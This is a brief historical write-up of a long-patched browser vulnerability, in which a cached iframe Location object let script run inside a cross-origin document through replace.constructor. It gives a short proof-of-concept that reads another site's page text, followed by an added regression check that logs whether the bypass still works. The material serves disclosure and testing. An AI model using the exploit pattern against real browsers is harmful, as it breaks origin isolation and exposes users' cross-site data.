Caching the location object of a same-origin IFrame, redirecting it cross-origin, and then calling .replace.constructor() on the cached location object gave access to the Function constructor of the new cross-origin document. Code created through that constructor executed in the cross-origin context.

// ifr is the same-origin frame's window (e.g. a named iframe); cache its Location.
var xLocation = ifr.location;
// Navigate the frame to another origin. The cached object is not dropped.
ifr.location.href = "http://www.google.com";
// After navigation: replace is still reachable on the cached object, and its
// constructor was the Function of the new cross-origin document.
xLocation.replace.constructor(
    "alert(document.URL + '\\n\\n' + document.body.innerText)"
)();

The location.replace method reference survived the cross-origin navigation. Accessing .constructor on a native function returns the Function constructor of the realm that function belongs to. Here that realm was the new cross-origin document rather than the caller's, so the function built from it ran with full access to Google's DOM.
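As an added regression check (not code from the original post), the page below caches the frame's Location the same way, navigates the frame cross-origin, and reports which origin a function built through replace.constructor actually sees, for both the cached and the live Location object. CROSS_ORIGIN_URL is a placeholder for any origin other than the one serving this page.

```html
<!DOCTYPE html>
<!-- Added regression check; not from the original post. Serve from any origin
     that differs from CROSS_ORIGIN_URL (placeholder value below). -->
<iframe id="ifr"></iframe>
<script>
  var CROSS_ORIGIN_URL = "https://cross-origin.example/"; // placeholder
  var ifr = document.getElementById("ifr");
  // The frame starts as the initial about:blank, which is same-origin with us,
  // so this is the same kind of reference the original bug relied on.
  var cached = ifr.contentWindow.location;

  // Build a function via loc.replace.constructor and return the origin of the
  // document it runs against; "blocked" if any step throws (e.g. SecurityError).
  function originSeenVia(loc) {
    try {
      var fn = loc.replace.constructor("return document.URL;");
      return new URL(fn()).origin;          // "null" for about:blank
    } catch (e) {
      return "blocked";
    }
  }

  function onLoad() {
    // Ignore load events fired while the frame is still same-origin.
    try { void ifr.contentWindow.location.pathname; return; } catch (e) {}
    ifr.removeEventListener("load", onLoad);

    // The frame now holds a cross-origin document. Neither the cached nor the
    // live Location may hand us a function that executes inside that document.
    var target = new URL(CROSS_ORIGIN_URL).origin;
    var checks = [
      ["cached Location", originSeenVia(cached)],
      ["live Location",   originSeenVia(ifr.contentWindow.location)]
    ];
    checks.forEach(function (c) {
      var safe = c[1] !== target;
      console.log((safe ? "PASS " : "FAIL ") + c[0] + ": sees " + c[1]);
    });
  }

  ifr.addEventListener("load", onLoad);
  ifr.contentWindow.location.href = CROSS_ORIGIN_URL;  // navigate cross-origin
</script>
```

A browser that still had the original bug would log FAIL for the cached Location, because the constructed function would report the frame's new origin.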

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.